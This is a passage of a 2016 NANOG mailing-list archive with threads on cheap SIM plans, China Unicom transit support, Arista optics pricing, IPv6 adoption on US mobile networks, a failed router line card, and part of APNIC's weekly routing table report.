Eric Kuhnke > wrote: > >> The "Ting" MVNO is owned/run by the Tucows people (remember them!) and >> runs >> on either Sprint or T-Mobile's network depending on where you are. >> >> For very low data rate OOB access type things it can be as low as $10/mo >> for an active LTE SIM card. >> >> https://ting.com/rates?ab=1 >> >> >> >> On Thu, Aug 18, 2016 at 10:51 AM, John Levine wrote: >> >> > >Then I went into a t-mobile store and bought a few $25/mo SIM cards, >> put >> > credit card on file to auto renew each month, slapped them in, and >> pointed >> > our NMS?s at them. >> > >> > Since this comes up from time to time, here's the cheapest US SIM plans >> I >> > know of. >> > >> > Tracfone BYOD runs on AT&T or Verizon (the latter is LTE only) and the >> > cheapest plan is $18 for 90 days if you sign up and autorenew. That >> > gives you 180 SMS. and if you want them 180 mins of voice and 180MB of >> > data, unused rolls over. Customer service is OK, seems to be in the >> > US, aimed at a bilingual Spanish/English market. >> > >> > Airvoice Wireless runs on AT&T. Their $10/mo plan is good for 500 >> > SMS/mo, no rollover. Their $20/mo plan has unmetered SMS and voice. >> > They have very good US-based customer service. >> > >> > R's, >> > John >> > >> > > > > -- > -- > Sean Watkins > 403-629-6152 > From james.braunegg at micron21.com Fri Aug 19 01:52:54 2016 From: james.braunegg at micron21.com (James Braunegg) Date: Fri, 19 Aug 2016 01:52:54 +0000 Subject: =?Windows-1252?Q?China_Unicom_=96_Does_anyone_still_work_for_them_=3F?= Message-ID: <934c37659e3f47859006273c43809f2b@EX-01.m21.local> Dear All Just wondering if anyone is responsible and proactive and wants new IP Transit sales for China Unicom ? or is it time to say good bye to using China Unicom and hello to China Telecom ? Whilst we are a client of China Unicom purchasing IP transit, the support / service provision lead times to date has been a horrible experience.? My current contacts within the USA rarely reply to emails and services take 12 months+ to be provisioned?. staff who have been helpful in the past just disappear into thin air? It feels like they just don?t want my money?. So any Advice would be great. Looking forward to hearing from anyone who can help Kindest Regards James Braunegg P: 1300 769 972 | M: 0488 997 207 | D: (03) 9751 7616 E: james.braunegg at micron21.com | ABN: 12 109 977 666 W: www.micron21.com/ddos-protection T: @micron21 Follow us on Twitter for important service and system updates. [M21.jpg] This message is intended for the addressee named above. It may contain privileged or confidential information. If you are not the intended recipient of this message you must not use, copy, distribute or disclose it to anyone other than the addressee. If you have received this message in error please return the message to the sender by replying to it and then delete the message from your computer. From jfbeam at gmail.com Fri Aug 19 01:59:01 2016 From: jfbeam at gmail.com (Ricky Beam) Date: Thu, 18 Aug 2016 21:59:01 -0400 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> Message-ID: On Thu, 18 Aug 2016 08:05:30 -0400, Tim Jackson wrote: > "As I'm sure you know, Arista is not the only manufacturer that has made > this choice. Unlike our competition, we work to make our optics pricing > competitive, but we'll never be as low as the "Taiwan specials" that you > see floating around. I have another customer that was flashing white > label > optics that just made the decision to start using Arista labeled optics > again because they were tired of bad quality." I can't count the number of times I've seen this BS from vendors. I'm not buying crap made in a shack out in a rain forest. I'm buying the same f'ing optics from the same f'ing people as the vendor. (Finisar, Infineon, etc.) The only difference between my $10 optic and their $300 optic is the value in an EEPROM and the logo on the label. (I know from experience, the numbers on the price sheet are inflated so sales can maintain the illusion of "deep customer discounts". As the saying goes, only an idiot pays list price.) From eric.kuhnke at gmail.com Fri Aug 19 03:41:08 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Thu, 18 Aug 2016 20:41:08 -0700 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> Message-ID: Though it would be really interesting to see, if a company like Cisco or Juniper ever suffered a major data leak, what number of customers really do pay full list price for some stuff. "Yeppers, twenty 1310nm LX 10Gb SFP+ for $4800 each, sounds good. Where do we send the check?" On Thu, Aug 18, 2016 at 6:59 PM, Ricky Beam wrote: > On Thu, 18 Aug 2016 08:05:30 -0400, Tim Jackson > wrote: > >> "As I'm sure you know, Arista is not the only manufacturer that has made >> this choice. Unlike our competition, we work to make our optics pricing >> competitive, but we'll never be as low as the "Taiwan specials" that you >> see floating around. I have another customer that was flashing white label >> optics that just made the decision to start using Arista labeled optics >> again because they were tired of bad quality." >> > > I can't count the number of times I've seen this BS from vendors. I'm not > buying crap made in a shack out in a rain forest. I'm buying the same f'ing > optics from the same f'ing people as the vendor. (Finisar, Infineon, etc.) > The only difference between my $10 optic and their $300 optic is the value > in an EEPROM and the logo on the label. > > (I know from experience, the numbers on the price sheet are inflated so > sales can maintain the illusion of "deep customer discounts". As the saying > goes, only an idiot pays list price.) > From eric.kuhnke at gmail.com Fri Aug 19 03:42:16 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Thu, 18 Aug 2016 20:42:16 -0700 Subject: =?UTF-8?Q?Re=3A_China_Unicom_=E2=80=93_Does_anyone_still_work_for_them?= =?UTF-8?Q?_=3F?= In-Reply-To: <934c37659e3f47859006273c43809f2b@EX-01.m21.local> References: <934c37659e3f47859006273c43809f2b@EX-01.m21.local> Message-ID: Is it nuts to ask if you've had fluent Mandarin or Cantonese speaking staff members contact them? On Thu, Aug 18, 2016 at 6:52 PM, James Braunegg wrote: > Dear All > > Just wondering if anyone is responsible and proactive and wants new IP > Transit sales for China Unicom ? or is it time to say good bye to using > China Unicom and hello to China Telecom ? > > Whilst we are a client of China Unicom purchasing IP transit, the support > / service provision lead times to date has been a horrible experience.? My > current contacts within the USA rarely reply to emails and services take 12 > months+ to be provisioned?. staff who have been helpful in the past just > disappear into thin air? It feels like they just don?t want my money?. So > any Advice would be great. > > Looking forward to hearing from anyone who can help > > Kindest Regards > > James Braunegg > P: 1300 769 972 | M: 0488 997 207 | D: (03) 9751 7616 > E: james.braunegg at micron21.com | > ABN: 12 109 977 666 > W: www.micron21.com/ddos-protection micron21.com/ddos-protection> T: @micron21 > > Follow us on Twitter for important > service and system updates. > > [M21.jpg] > > This message is intended for the addressee named above. It may contain > privileged or confidential information. If you are not the intended > recipient of this message you must not use, copy, distribute or disclose it > to anyone other than the addressee. If you have received this message in > error please return the message to the sender by replying to it and then > delete the message from your computer. > > From cb.list6 at gmail.com Fri Aug 19 12:10:11 2016 From: cb.list6 at gmail.com (Ca By) Date: Fri, 19 Aug 2016 05:10:11 -0700 Subject: RIP ipv4 dominance Message-ID: This not RIP ipv4, but RIP dominance, on mobile, in the USA , .... This is an epic milestone for ipv6 http://www.worldipv6launch.org/major-mobile-us-networks-pass-50-ipv6-threshold/ From surfer at mauigateway.com Fri Aug 19 12:33:43 2016 From: surfer at mauigateway.com (Scott Weeks) Date: Fri, 19 Aug 2016 05:33:43 -0700 Subject: RIP ipv4 dominance Message-ID: <20160819053343.79A401F4@m0087792.ppops.net> --- cb.list6 at gmail.com wrote: This not RIP ipv4, but RIP dominance, on mobile, in the USA , .... This is an epic milestone for ipv6 http://www.worldipv6launch.org/major-mobile-us-networks-pass-50-ipv6-threshold/ ---------------------------------------------- And from another point of view... I just saw this over on MENOG: +++++++++++++++++++++ From: "Ahmed Abu-Abed" To: "'menog at menog. net'" Subject: [menog] IPv6 new milestone at Facebook Date: Thu 08/18/16 09:39 PM 2016/08/16 - first day that more people used IPv6 to access Facebook than IPv4 from the 4 major USA mobile networks. source: Paul Saab ? Facebook IPv6 team https://twitter.com/yogurtboy/status/765808619434704897?refsrc=email&s=11 ++++++++++++++++++++++ scott From ryan.dirocco at totalserversolutions.com Fri Aug 19 12:38:01 2016 From: ryan.dirocco at totalserversolutions.com (Ryan DiRocco) Date: Fri, 19 Aug 2016 12:38:01 +0000 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> , Message-ID: I wouldn't be surprised to see GOV contracts in that list :) It's the new $10,000 toilet seat to fund black ops! ________________________________________ From: NANOG [nanog-bounces at nanog.org] on behalf of Eric Kuhnke [eric.kuhnke at gmail.com] Sent: Thursday, August 18, 2016 10:41 PM To: nanog at nanog.org Subject: Re: Arista unqualified SFP Though it would be really interesting to see, if a company like Cisco or Juniper ever suffered a major data leak, what number of customers really do pay full list price for some stuff. "Yeppers, twenty 1310nm LX 10Gb SFP+ for $4800 each, sounds good. Where do we send the check?" On Thu, Aug 18, 2016 at 6:59 PM, Ricky Beam wrote: > On Thu, 18 Aug 2016 08:05:30 -0400, Tim Jackson > wrote: > >> "As I'm sure you know, Arista is not the only manufacturer that has made >> this choice. Unlike our competition, we work to make our optics pricing >> competitive, but we'll never be as low as the "Taiwan specials" that you >> see floating around. I have another customer that was flashing white label >> optics that just made the decision to start using Arista labeled optics >> again because they were tired of bad quality." >> > > I can't count the number of times I've seen this BS from vendors. I'm not > buying crap made in a shack out in a rain forest. I'm buying the same f'ing > optics from the same f'ing people as the vendor. (Finisar, Infineon, etc.) > The only difference between my $10 optic and their $300 optic is the value > in an EEPROM and the logo on the label. > > (I know from experience, the numbers on the price sheet are inflated so > sales can maintain the illusion of "deep customer discounts". As the saying > goes, only an idiot pays list price.) > From dmitry at interhost.net Fri Aug 19 15:00:33 2016 From: dmitry at interhost.net (Dmitry Sherman) Date: Fri, 19 Aug 2016 15:00:33 +0000 Subject: Lc fail a9k1 In-Reply-To: References: <934c37659e3f47859006273c43809f2b@EX-01.m21.local>, Message-ID: Hello dear colleagues, Any chance to recover/repair or replace failed lc on asr9001? The line card probably dead (after flood disaster), rsp alive, flash, fans and psu also in good condition. Thanks in advance! Thanks Best regards, Dmitry Sherman Interhost Networks www.interhost.co.il Dmitry at interhost.net Mob: 054-3181182 Sent from Steve's creature [X] On 19 ????? 2016, at 6:44, Eric Kuhnke > wrote: Is it nuts to ask if you've had fluent Mandarin or Cantonese speaking staff members contact them? On Thu, Aug 18, 2016 at 6:52 PM, James Braunegg wrote: Dear All Just wondering if anyone is responsible and proactive and wants new IP Transit sales for China Unicom ? or is it time to say good bye to using China Unicom and hello to China Telecom ? Whilst we are a client of China Unicom purchasing IP transit, the support / service provision lead times to date has been a horrible experience.? My current contacts within the USA rarely reply to emails and services take 12 months+ to be provisioned?. staff who have been helpful in the past just disappear into thin air? It feels like they just don?t want my money?. So any Advice would be great. Looking forward to hearing from anyone who can help Kindest Regards James Braunegg P: 1300 769 972 | M: 0488 997 207 | D: (03) 9751 7616 E: james.braunegg at micron21.com | ABN: 12 109 977 666 W: www.micron21.com/ddos-protection> T: @micron21 Follow us on Twitter for important service and system updates. [M21.jpg] This message is intended for the addressee named above. It may contain privileged or confidential information. If you are not the intended recipient of this message you must not use, copy, distribute or disclose it to anyone other than the addressee. If you have received this message in error please return the message to the sender by replying to it and then delete the message from your computer. This mail was received via PineApp Mail-SeCure System. From ahebert at pubnix.net Fri Aug 19 17:17:51 2016 From: ahebert at pubnix.net (Alain Hebert) Date: Fri, 19 Aug 2016 13:17:51 -0400 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> Message-ID: Well, Context: Starting with 10Gb the optics are more finicky. Part of that price hike include tech support (1) which you will never get from most OEM vendor. PS: Mine is pretty good. Having dealt with a few optic issues lately: . Why that 10km LR won't work with that circuit, oh its a 8.5km + fusion + etc, your cutting it a bit short there bud, replaced them by ER's ( Cost: 3 weeks lag on delivery and ~10h ) . Why is that XFP ain't working in those x450, oh its a power issue :( ( Cost: 6h, delivery was no issue ) But the question remains, does $290 is over charging it for that type of insurance. PS: Approaching those issue logically with less Trumpish hyperbole make more sense, almost as much as the Juniper pricing with their 78%+ discounts off their official pricelist =D ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 08/18/16 21:59, Ricky Beam wrote: > On Thu, 18 Aug 2016 08:05:30 -0400, Tim Jackson > wrote: >> "As I'm sure you know, Arista is not the only manufacturer that has made >> this choice. Unlike our competition, we work to make our optics pricing >> competitive, but we'll never be as low as the "Taiwan specials" that you >> see floating around. I have another customer that was flashing white >> label >> optics that just made the decision to start using Arista labeled optics >> again because they were tired of bad quality." > > I can't count the number of times I've seen this BS from vendors. I'm > not buying crap made in a shack out in a rain forest. I'm buying the > same f'ing optics from the same f'ing people as the vendor. (Finisar, > Infineon, etc.) The only difference between my $10 optic and their > $300 optic is the value in an EEPROM and the logo on the label. > > (I know from experience, the numbers on the price sheet are inflated > so sales can maintain the illusion of "deep customer discounts". As > the saying goes, only an idiot pays list price.) > From eric.kuhnke at gmail.com Fri Aug 19 17:30:49 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Fri, 19 Aug 2016 10:30:49 -0700 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> Message-ID: I would like to see optics made in a shack in a rain forest, maybe we can find a new market to sell hand made artisanal fair trade organic GMO-free gluten-free lasers. On Thu, Aug 18, 2016 at 6:59 PM, Ricky Beam wrote: > On Thu, 18 Aug 2016 08:05:30 -0400, Tim Jackson > wrote: > >> "As I'm sure you know, Arista is not the only manufacturer that has made >> this choice. Unlike our competition, we work to make our optics pricing >> competitive, but we'll never be as low as the "Taiwan specials" that you >> see floating around. I have another customer that was flashing white label >> optics that just made the decision to start using Arista labeled optics >> again because they were tired of bad quality." >> > > I can't count the number of times I've seen this BS from vendors. I'm not > buying crap made in a shack out in a rain forest. I'm buying the same f'ing > optics from the same f'ing people as the vendor. (Finisar, Infineon, etc.) > The only difference between my $10 optic and their $300 optic is the value > in an EEPROM and the logo on the label. > > (I know from experience, the numbers on the price sheet are inflated so > sales can maintain the illusion of "deep customer discounts". As the saying > goes, only an idiot pays list price.) > From cscora at apnic.net Fri Aug 19 18:01:43 2016 From: cscora at apnic.net (Routing Analysis Role Account) Date: Sat, 20 Aug 2016 04:01:43 +1000 (AEST) Subject: Weekly Routing Table Report Message-ID: <20160819180143.7D4A2AB45D@thyme.apnic.net> This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, SAFNOG, SdNOG, BJNOG, CaribNOG and the RIPE Routing WG. Daily listings are sent to bgp-stats at lists.apnic.net For historical data, please see http://thyme.rand.apnic.net. If you have any comments please contact Philip Smith . Routing Table Report 04:00 +10GMT Sat 20 Aug, 2016 Report Website: http://thyme.rand.apnic.net Detailed Analysis: http://thyme.rand.apnic.net/current/ Analysis Summary ---------------- BGP routing table entries examined: 606224 Prefixes after maximum aggregation (per Origin AS): 219465 Deaggregation factor: 2.76 Unique aggregates announced (without unneeded subnets): 296500 Total ASes present in the Internet Routing Table: 54628 Prefixes per ASN: 11.10 Origin-only ASes present in the Internet Routing Table: 36451 Origin ASes announcing only one prefix: 15461 Transit ASes present in the Internet Routing Table: 6482 Transit-only ASes present in the Internet Routing Table: 173 Average AS path length visible in the Internet Routing Table: 4.3 Max AS path length visible: 54 Max AS path prepend of ASN ( 55644) 51 Prefixes from unregistered ASNs in the Routing Table: 61 Unregistered ASNs in the Routing Table: 16 Number of 32-bit ASNs allocated by the RIRs: 15101 Number of 32-bit ASNs visible in the Routing Table: 11695 Prefixes from 32-bit ASNs in the Routing Table: 46366 Number of bogon 32-bit ASNs visible in the Routing Table: 33 Special use prefixes present in the Routing Table: 0 Prefixes being announced from unallocated address space: 340 Number of addresses announced to Internet: 2821914468 Equivalent to 168 /8s, 50 /16s and 255 /24s Percentage of available address space announced: 76.2 Percentage of allocated address space announced: 76.2 Percentage of available address space allocated: 100.0 Percentage of address space in use by end-sites: 98.2 Total number of prefixes smaller than registry allocations: 197037 APNIC Region Analysis Summary ----------------------------- Prefixes being announced by APNIC Region ASes: 155735 Total APNIC prefixes after maximum aggregation: 42924 APNIC Deaggregation factor: 3.63 Prefixes being announced from the APNIC address blocks: 168786 Unique aggregates announced from the APNIC address blocks: 68899 APNIC Region origin ASes present in the Internet Routing Table: 5189 APNIC Prefixes per ASN: 32.53 APNIC Region origin ASes announcing only one prefix: 1171 APNIC Region transit ASes present in the Internet Routing Table: 928 Average APNIC Region AS path length visible: 4.5 Max APNIC Region AS path length visible: 54 Number of APNIC region 32-bit ASNs visible in the Routing Table: 2311 Number of APNIC addresses announced to Internet: 759335748 Equivalent to 45 /8s, 66 /16s and 139 /24s APNIC AS Blocks 4608-4864, 7467-7722, 9216-10239, 17408-18431 (pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079, 55296-56319, 58368-59391, 63488-64098, 64297-64395, 131072-137529 APNIC Address Blocks 1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8, ARIN Region Analysis Summary ---------------------------- Prefixes being announced by ARIN Region ASes: 182874 Total ARIN prefixes after maximum aggregation: 89341 ARIN Deaggregation factor: 2.05 Prefixes being announced from the ARIN address blocks: 188542 Unique aggregates announced from the ARIN address blocks: 88104 ARIN Region origin ASes present in the Internet Routing Table: 16238 ARIN Prefixes per ASN: 11.61 ARIN Region origin ASes announcing only one prefix: 5734 ARIN Region transit ASes present in the Internet Routing Table: 1712 Average ARIN Region AS path length visible: 3.8 Max ARIN Region AS path length visible: 23 Number of ARIN region 32-bit ASNs visible in the Routing Table: 1402 Number of ARIN addresses announced to Internet: 1105120096 Equivalent to 65 /8s, 222 /16s and 203 /24s ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106 (pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-3153 3354-4607, 4865-5119, 5632-6655, 6912-7466 7723-8191, 10240-12287, 13312-15359, 16384-17407 18432-20479, 21504-23551, 25600-26591, 26624-27647, 29696-30719, 31744-33791 35840-36863, 39936-40959, 46080-47103 53248-55295, 62464-63487, 64198-64296, 393216-397212 ARIN Address Blocks 3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8, 15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8, 24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8, 38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8, 54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8, 68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8, 96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8, 128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8, 137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8, 147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8, 159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8, 168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8, 198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8, 214/8, 215/8, 216/8, RIPE Region Analysis Summary ---------------------------- Prefixes being announced by RIPE Region ASes: 145131 Total RIPE prefixes after maximum aggregation: 71614 RIPE Deaggregation factor: 2.03 Prefixes being announced from the RIPE address blocks: 155153 Unique aggregates announced from the RIPE address blocks: 96085 RIPE Region origin ASes present in the Internet Routing Table: 18113 RIPE Prefixes per ASN: 8.57 RIPE Region origin ASes announcing only one prefix: 7827 RIPE Region transit ASes present in the Internet Routing Table: 3018 Average RIPE Region AS path length visible: 4.4 Max RIPE Region AS path length visible: 27 Number of RIPE region 32-bit ASNs visible in the Routing Table: 5008 Number of RIPE addresses announced to Internet: 706190208 Equivalent to 42 /8s, 23 /16s and 155 /24s RIPE AS Blocks 1877-1901, 2043, 2047, 2107-2136, 2585-2614 (pre-ERX allocations) 2773-2822, 2830-2879, 3154-3353, 5377-5631 6656-6911, 8192-9215, 12288-13311, 15360-16383 20480-21503, 24576-25599, 28672-29695 30720-31743, 33792-35839, 38912-39935 40960-45055, 47104-52223, 56320-58367 59392-61439, 61952-62463, 64396-64495 196608-207259 RIPE Address Blocks 2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8, LACNIC Region Analysis Summary ------------------------------ Prefixes being announced by LACNIC Region ASes: 61593 Total LACNIC prefixes after maximum aggregation: 12302 LACNIC Deaggregation factor: 5.01 Prefixes being announced from the LACNIC address blocks: 76960 Unique aggregates announced from the LACNIC address blocks: 36993 LACNIC Region origin ASes present in the Internet Routing Table: 2476 LACNIC Prefixes per ASN: 31.08 LACNIC Region origin ASes announcing only one prefix: 556 LACNIC Region transit ASes present in the Internet Routing Table: 581 Average LACNIC Region AS path length visible: 4.8 Max LACNIC Region AS path length visible: 24 Number of LACNIC region 32-bit ASNs visible in the Routing Table: 2729 Number of LACNIC addresses announced to Internet: 169885504 Equivalent to 10 /8s, 32 /16s and 63 /24s LACNIC AS Blocks 26592-26623, 27648-28671, 52224-53247, 61440-61951, 64099-64197, 262144-265628 + ERX transfers LACNIC Address Blocks 177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8, 191/8, 200/8, 201/8, AfriNIC Region Analysis Summary ------------------------------- Prefixes being announced by AfriNIC Region ASes: 14463 Total AfriNIC prefixes after maximum aggregation: 3274 AfriNIC Deaggregation factor: 4.42 Prefixes being announced from the AfriNIC address blocks: 16443 Unique aggregates announced from the AfriNIC address blocks: 6106 AfriNIC Region origin ASes present in the Internet Routing Table: 737 AfriNIC Prefixes per ASN: 22.31 AfriNIC Region origin ASes announcing only one prefix: 173 AfriNIC Region transit ASes present in the Internet Routing Table: 179 Average AfriNIC Region AS path length visible: 4.5 Max AfriNIC Region AS path length visible: 20 Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 245 Number of AfriNIC addresses announced to Internet: 81057280 Equivalent to 4 /8s, 212 /16s and 214 /24s AfriNIC AS Blocks 36864-37887, 327680-328703 & ERX transfers AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8, APNIC Region per AS prefix count summary ---------------------------------------- ASN No of nets /20 equiv MaxAgg Description 4538 5551 4190 74 ERX-CERNET-BKB China Education and Rese 7545 3496 385 256 TPG-INTERNET-AP TPG Telecom Limited, AU 4766 3200 11145 1130 KIXS-AS-KR Korea Telecom, KR 17974 2939 904 78 TELKOMNET-AS2-AP PT Telekomunikasi Indo 9829 2659 1494 526 BSNL-NIB National Internet Backbone, IN 9808 2144 8781 42 CMNET-GD Guangdong Mobile Communication 4755 2056 429 227 TATACOMM-AS TATA Communications formerl 4808 1759 2293 533 CHINA169-BJ China Unicom Beijing Provin 24560 1531 505 217 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd 38197 1514 94 286 SUNHK-DATA-AS-AP Sun Network (Hong Kong Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC ARIN Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 22773 3494 2964 144 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 6389 2227 3671 41 BELLSOUTH-NET-BLK - BellSouth.net Inc., 18566 2194 405 110 MEGAPATH5-US - MegaPath Corporation, US 20115 1936 1965 402 CHARTER-NET-HKY-NC - Charter Communicat 30036 1745 341 281 MEDIACOM-ENTERPRISE-BUSINESS - Mediacom 209 1714 5082 655 CENTURYLINK-US-LEGACY-QWEST - Qwest Com 6983 1688 849 228 ITCDELTA - Earthlink, Inc., US 16509 1382 2530 447 AMAZON-02 - Amazon.com, Inc., US 7018 1343 20058 997 ATT-INTERNET4 - AT&T Services, Inc., US 701 1289 10719 696 UUNET - MCI Communications Services, In Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN RIPE Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 39891 3329 169 15 ALJAWWALSTC-AS , SA 20940 2763 1063 1967 AKAMAI-ASN1 , US 34984 1983 327 357 TELLCOM-AS , TR 12479 1315 1018 46 UNI2-AS , ES 8551 1213 377 46 BEZEQ-INTERNATIONAL-AS Bezeqint Interne 6849 1148 355 21 UKRTELNET , UA 13188 1097 98 64 BANKINFORM-AS , UA 8402 1002 544 15 CORBINA-AS Russia, RU 9198 928 352 25 KAZTELECOM-AS , KZ 6830 886 2752 465 LGI-UPC formerly known as UPC Broadband Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE LACNIC Region per AS prefix count summary ----------------------------------------- ASN No of nets /20 equiv MaxAgg Description 10620 3477 541 154 Telmex Colombia S.A., CO 8151 2266 3361 544 Uninet S.A. de C.V., MX 7303 1539 949 243 Telecom Argentina S.A., AR 6503 1415 437 55 Axtel, S.A.B. de C.V., MX 11830 1344 368 65 Instituto Costarricense de Electricidad 6147 1076 377 27 Telefonica del Peru S.A.A., PE 7738 994 1882 40 Telemar Norte Leste S.A., BR 3816 956 459 212 COLOMBIA TELECOMUNICACIONES S.A. ESP, C 11172 907 125 76 Alestra, S. de R.L. de C.V., MX 28573 896 2180 158 CLARO S.A., BR Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC AfriNIC Region per AS prefix count summary ------------------------------------------ ASN No of nets /20 equiv MaxAgg Description 24863 1184 402 48 LINKdotNET-AS, EG 36903 651 327 118 MT-MPLS, MA 37611 649 48 2 Afrihost, ZA 36992 539 1357 26 ETISALAT-MISR, EG 8452 524 1472 15 TE-AS TE-AS, EG 37492 380 246 69 ORANGE-TN, TN 24835 348 610 16 RAYA-AS, EG 29571 301 37 12 CITelecom-AS, CI 15399 293 35 6 WANANCHI-KE, KE 2018 264 327 74 TENET-1, ZA Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC Global Per AS prefix count summary ---------------------------------- ASN No of nets /20 equiv MaxAgg Description 4538 5551 4190 74 ERX-CERNET-BKB China Education and Rese 7545 3496 385 256 TPG-INTERNET-AP TPG Telecom Limited, AU 22773 3494 2964 144 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 10620 3477 541 154 Telmex Colombia S.A., CO 39891 3329 169 15 ALJAWWALSTC-AS , SA 4766 3200 11145 1130 KIXS-AS-KR Korea Telecom, KR 17974 2939 904 78 TELKOMNET-AS2-AP PT Telekomunikasi Indo 20940 2763 1063 1967 AKAMAI-ASN1 , US 9829 2659 1494 526 BSNL-NIB National Internet Backbone, IN 8151 2266 3361 544 Uninet S.A. de C.V., MX Complete listing at http://thyme.rand.apnic.net/current/data-ASnet Global Per AS Maximum Aggr summary ---------------------------------- ASN No of nets Net Savings Description 22773 3494 3350 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 10620 3477 3323 Telmex Colombia S.A., CO 39891 3329 3314 ALJAWWALSTC-AS , SA 7545 3496 3240 TPG-INTERNET-AP TPG Telecom Limited, AU 17974 2939 2861 TELKOMNET-AS2-AP PT Telekomunikasi Indo 6389 2227 2186 BELLSOUTH-NET-BLK - BellSouth.net Inc., 9829 2659 2133 BSNL-NIB National Internet Backbone, IN 9808 2144 2102 CMNET-GD Guangdong Mobile Communication 18566 2194 2084 MEGAPATH5-US - MegaPath Corporation, US 4766 3200 2070 KIXS-AS-KR Korea Telecom, KR Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet List of Unregistered Origin ASNs (Global) ----------------------------------------- Bad AS Designation Network Transit AS Description 65001 PRIVATE 5.143.176.0/20 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.192.0/20 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.192.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.200.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.208.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.216.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65000 PRIVATE 31.219.177.0/25 8966 ETISALAT-AS P.O. Box 1150, Dub 65000 PRIVATE 31.219.177.128/25 8966 ETISALAT-AS P.O. Box 1150, Dub 65412 PRIVATE 41.89.7.0/24 36866 JTL, KE 65512 PRIVATE 45.252.244.0/24 45899 VNPT-AS-VN VNPT Corp, VN Complete listing at http://thyme.rand.apnic.net/current/data-badAS Advertised Unallocated Addresses -------------------------------- Network Origin AS Description 23.249.144.0/20 40430 COLO4JAX-AS - colo4jax, LLC, US 27.100.7.0/24 56096 UNKNOWN 